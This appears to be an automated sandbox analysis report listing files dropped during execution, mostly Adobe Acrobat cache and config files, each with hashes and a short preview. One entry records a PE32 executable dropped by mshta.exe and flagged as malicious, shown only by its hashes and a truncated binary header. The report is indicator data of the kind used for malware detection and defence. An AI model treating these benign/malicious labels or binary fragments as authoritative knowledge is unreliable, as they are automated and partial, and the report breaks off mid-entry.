                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.262251339579728
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf8dPeUkwRe9:YvXKXcKiYpW7aZGU8Ukee9
                                                                                                                                                                                                                                              MD5:0D9172F7F5C9F153929F28E4F07888AE
                                                                                                                                                                                                                                              SHA1:9C2E67C3459A0B63F2574514AD294797D3DDAC49
                                                                                                                                                                                                                                              SHA-256:DB77ABAE316C158008E73E25BDD1C8D87A7F822946AF0DAFCA8A313E88604899
                                                                                                                                                                                                                                              SHA-512:6534598ACFDCC259F90783404CAD858DEB422CAF714D464E8FD0F991B8BFC9C7A5D2B22CE2DA3ADFAB8966C58C53D660ECE041ACB922C44F6923F2F9C58F20D7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):292
                                                                                                                                                                                                                                              Entropy (8bit):5.264177993824607
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfQ1rPeUkwRe9:YvXKXcKiYpW7aZGY16Ukee9
                                                                                                                                                                                                                                              MD5:D3B017B0ED0324877076F42F93684670
                                                                                                                                                                                                                                              SHA1:657647418924335BADAEAB87BAED78A197EED223
                                                                                                                                                                                                                                              SHA-256:A87206504DF8AAF8AEDB932E7D894A39E2A58C34A52CE98775ACFBAB31F28FF9
                                                                                                                                                                                                                                              SHA-512:31F57435011E883D6D8F660D80611ADE7247B10BE4204C0C85BD14C78313D3EDAD2925DFFE3322535E8AA6FBD33207E0C4CF846AF5E763614631E7DCC5356F57
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.283222846336828
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfFldPeUkwRe9:YvXKXcKiYpW7aZGz8Ukee9
                                                                                                                                                                                                                                              MD5:824912F311F5741668272CF55F8DB1EA
                                                                                                                                                                                                                                              SHA1:AEEB3608A3408A5F6D41F11402B3A95E22FF1F7A
                                                                                                                                                                                                                                              SHA-256:92C7AA4311E488A88DB1C00CCD180F04F01CCAD736C891A36C1D25868530AE5C
                                                                                                                                                                                                                                              SHA-512:0BBF0910D5BA22F5D26198761CCF7106EF058A564EB0A2C04CF86EA5F5D3397E6CB0D4231AE7C9103FB8161DD44C3B6B15BA65C925E51723A8F89F196B49889F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                              Entropy (8bit):5.290101400730302
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfzdPeUkwRe9:YvXKXcKiYpW7aZGb8Ukee9
                                                                                                                                                                                                                                              MD5:1AB5D76A616245FF72CFBFB406E9D8E3
                                                                                                                                                                                                                                              SHA1:3FBA0D66547D21E5D82D4E1E03DADEC809878042
                                                                                                                                                                                                                                              SHA-256:6FC514C5A38A7D47F62EEE8FA1B360E3697348AD5C21DB7EEF5B69376DAB9F8D
                                                                                                                                                                                                                                              SHA-512:ED1B9C756618A8545E2AA90C31EE3DEEAE7F8C7CB78C13201E2BA009242DCFB3D7E41F4079DD22E2F0404915D5C76FCAD7D33A0E9FDD8B68908F85C541FFDEEC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.270677960446839
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfYdPeUkwRe9:YvXKXcKiYpW7aZGg8Ukee9
                                                                                                                                                                                                                                              MD5:D9CF91BFA7380BE2CC2CB1BF78AA410A
                                                                                                                                                                                                                                              SHA1:CE03121E7C85F916F14933C5D5D95776A348549E
                                                                                                                                                                                                                                              SHA-256:0A213EC9AFA5C13AF000C4421A67E4FCD920EBD8AE9A177FA7BB8853F6326EBA
                                                                                                                                                                                                                                              SHA-512:53BDE86205B5377D66F82A6C89FC5C9C8FD076891BA5041E6BC9695A43AD1485B7DA031FB827124C545CE67375686B1A7A67002F770A69A6AB2D6ADA35966835
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                              Entropy (8bit):5.25651109110663
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf+dPeUkwRe9:YvXKXcKiYpW7aZG28Ukee9
                                                                                                                                                                                                                                              MD5:57F7B7D63B095D7A524CFAD016F72FA5
                                                                                                                                                                                                                                              SHA1:77A53AC174FBA59EDD8040A4821FBB9F1EA6DE67
                                                                                                                                                                                                                                              SHA-256:A74EA2AB1FF615E31FD88BEA4E06F0912B2BEB6D1FA761E4A463A398E7CBF4D2
                                                                                                                                                                                                                                              SHA-512:B625E1AB9323517BABC4EC4946EB20EA62396342020CA6B5E174E9351774BC08C3A5227AB8E6EC229F8DC2CA47765D77BEBD359BEC39E80E86A40629F09CF765
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                              Entropy (8bit):5.254426584165743
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfbPtdPeUkwRe9:YvXKXcKiYpW7aZGDV8Ukee9
                                                                                                                                                                                                                                              MD5:FF8D80C9F1CD11D2A9DBF1FDFD685A89
                                                                                                                                                                                                                                              SHA1:68A487F59688667AE0EFC0DD5BBF877EE186950A
                                                                                                                                                                                                                                              SHA-256:5C533FA37BF4CADD6F05AAA38CAF9A4C64C96175C1BE755076814F9616728766
                                                                                                                                                                                                                                              SHA-512:0F27D0903F062CE0BB9F0D3D2A673BA3BD811DF4278579554611D347102C85C45EF63A6D34AD11B851F3A1C9C163077C5387C6C7616640CB16F56553956E62C2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):287
                                                                                                                                                                                                                                              Entropy (8bit):5.2562692193870015
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf21rPeUkwRe9:YvXKXcKiYpW7aZG+16Ukee9
                                                                                                                                                                                                                                              MD5:C47E7B6F8C7F812EA5BC2D2850680B5D
                                                                                                                                                                                                                                              SHA1:7174807C87C315C4776C8C4839F72DF035CBD495
                                                                                                                                                                                                                                              SHA-256:83AF4AB8E39E32A47E85C64506D4A93348CB913FCC4D4D7091534AED49DDB844
                                                                                                                                                                                                                                              SHA-512:46ED74DD3DECD92ECF153636498C26D7BC5250388545022C1E363E65E05175E616BF22EA902984B96DBF547481AFDD220517C46A8F53493722723A323B9B8C88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                                                              Entropy (8bit):5.65651950679487
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Yv6XcKniaiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSSL:YvnKi7BgkDMUJUAh8cvMSL
                                                                                                                                                                                                                                              MD5:9C33438103E194517F8D56D80B9E5759
                                                                                                                                                                                                                                              SHA1:675AB9E1D34F26D3564F5C5A514E72FFDA63DDA9
                                                                                                                                                                                                                                              SHA-256:6F6F9572FA6D9DA4F7C5762C1C0BE51F0911E12F3591D3654C97FC41054F7862
                                                                                                                                                                                                                                              SHA-512:8F209E19AA8F1AE15DED3142243253CB22F687B62BE6732DC842C6942C088DBA74FC6C7475BAAC24862E76DB1A7C10CFE23A96BAE6F53F7F850197243EFDB8DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                                              Entropy (8bit):5.23020592265918
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfshHHrPeUkwRe9:YvXKXcKiYpW7aZGUUUkee9
                                                                                                                                                                                                                                              MD5:DC9512FE166AADFB93FFF4A021C966E4
                                                                                                                                                                                                                                              SHA1:EE2D5013B6FB995DEC812EB045C47DDBB5285719
                                                                                                                                                                                                                                              SHA-256:78F042098F58F2E8511FFE9FFB4B8E55EC3C86CBAFBBEFFE0067778A6E7D7545
                                                                                                                                                                                                                                              SHA-512:D7D3F9F5130130F5326DA5D75DC4291F862323D31DE9ADB338AAB9266971F1C227A0709FC3A85C44C05839A19D2E0F6A61F78A09024E0B67B9F0255757D794BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):282
                                                                                                                                                                                                                                              Entropy (8bit):5.248102411198653
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJTqgFCrPeUkwRe9:YvXKXcKiYpW7aZGTq16Ukee9
                                                                                                                                                                                                                                              MD5:83F13773AEE915EC66787B7BA875D3B5
                                                                                                                                                                                                                                              SHA1:7A5750227A9A6699B68318DF3083004A01A43BC9
                                                                                                                                                                                                                                              SHA-256:F8C5053DD66A44F604E630877AD5BF39A5A1F52EA12CC10C68583821F9C2CFD6
                                                                                                                                                                                                                                              SHA-512:1B2344C441E30A9F6C6F7F01E1FEBF74685088E0D918DE103171C32B0CFD3E628D4552D9FA03C522B49E0B1BB78F35B6E30135E32DBA895EEA38C1DF44229EE6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                              Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:e:e
                                                                                                                                                                                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):2814
Entropy (8bit):5.1426181114779
Encrypted:false
SSDEEP:24:YU14aFJBayDRMy9zAGmACooju2j0SM2Tk2Mn2LS+Cj7X5bmMyXgn5o5zb9WuTvOG:YUVl9cXxFUpns8XEMy8Cn93b
MD5:E1056373F571058A98CB598D08D5D185
SHA1:88D3CC68F9DE54FB21EB3883DC89B52D68B6E89F
SHA-256:C38F56B176B6B887F9DB942EE0C7C625E1B70C48679EB2305D33B70D0FBAF8C6
SHA-512:364918FBBA3EC48CEF87224833AC93CE3AFAE03BEEB8FEA7A86EA02B00C5C6E416C902E214F0E66B77962EB9356865684111731B662C852F901B80F6C21A08DC
Malicious:false
Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1d934eb09cef772ef77bc7857d13a625","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734789561000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"79d2716bd6f068ef769707ef613cb939","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734789561000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"53cfe998c4c4c2331901f5c22ee94350","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734789561000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e00a8bdb50c4a72e2f82c5e8ad2e92ff","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734789561000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ce17abf8707838ccd13036f3744b40d8","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734789561000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"47b0bd4c9ec924ecd494e932995a1623","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:dropped
Size (bytes):12288
Entropy (8bit):0.9848440404416242
Encrypted:false
SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpgzI44zJwtNBwtNbRZ6bRZ4FzI4F:TVl2GL7ms6ggOVpg87zutYtp6PS8k
MD5:872B25F8933D57B4AB3C90C37E12C9BC
SHA1:0966FA0FC81B24D6B7BD192A71F8D496CAF847B3
SHA-256:F5C0A93C76AEFC4533F69BBA4336BFECB2138FBD1B360C439E2557F7345A63AB
SHA-512:8CF00DDD5E3473F4978C8D84F79394854756E77DCAEF6C467ABE389A61F5A952319992327AF9B6003AA3D6DB9DFD0276128C12B440D2D1CB3D461A0F1AA0DC4B
Malicious:false
Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):8720
Entropy (8bit):1.3388355356906936
Encrypted:false
SSDEEP:48:7MrvGgOVpg8EzutYtp6PMeqll2GL7msa7:7SpOVpgAaIqVmsa7
MD5:7FED385D5524A2BE9240A522D5760078
SHA1:6CB2B141B5862406F0EF7E33237D1678A6141CC5
SHA-256:7D5F0A83811DBDB6CA294A09CC2948522D9ADB3B8FE3BF322DA1C7ADA09F0390
SHA-512:E5492DA3179FE05E5F103352FB5CC3FC8C6CE410EA1A10C85A78C97F9EECE9C5823C3FFA86077F0B022520C852CC3F5D8B6729F9CEC6CD9485A959D0BA36EECD
Malicious:false
Preview:.... .c......\.m......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:data
Category:dropped
Size (bytes):66726
Entropy (8bit):5.392739213842091
Encrypted:false
SSDEEP:768:RNOpblrU6TBH44ADKZEgftH0vvTsKsMk2ftkAvPbnmCwmXyYyu:6a6TZ44ADEftUvvTsKG2fsTmiK
MD5:D0B5764A990AC33FE59D71DA3F88FDCD
SHA1:25E8738D36756AD5DEA246DF2EE400C62115E4EE
SHA-256:67578B674468DA8E483854008B63003C4EE2F2614F217E2FB45A082FE660C30C
SHA-512:036740B4938EBD8E3CD0C9241B2B19BB2132BF9A56A9869015D98FDDAB28C0A4B9012CD5792A15C658177E7E393CD508458080F8733D29782DA82526B5245A98
Malicious:false
Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

Process:C:\Windows\System32\mshta.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473509
Entropy (8bit):6.338680344547592
Encrypted:false
SSDEEP:6144:e+WoC/IdkUPq5l+WoC/IdkUPq50+WoC/IdkUPq5w+WoC/IdkUPq5E+WoC/IdkUPO:epOkVpOkkpOkgpOk0pOk
MD5:76A62CFF0EC3A74D0F3640231BDA7CD7
SHA1:F193D6F36AC2CD410C3E23A0D10DC489B77F7281
SHA-256:CE8D61E9470CB0A16887540D38B463D0D23764770BB49E738600575A2D560012
SHA-512:F42303203828E60AF3A49293176A7D17B261881DA8A22862E17944DE6E6C318EF6F1F22DDD4196A3273FB5D3077F5479875B8EFBA413A3989F7713A4025C8503
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 34%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.................................{.....@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):11608
Entropy (8bit):4.890472898059848
Encrypted:false
SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:false
Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):246
Entropy (8bit):3.5209238895127717
Encrypted:false
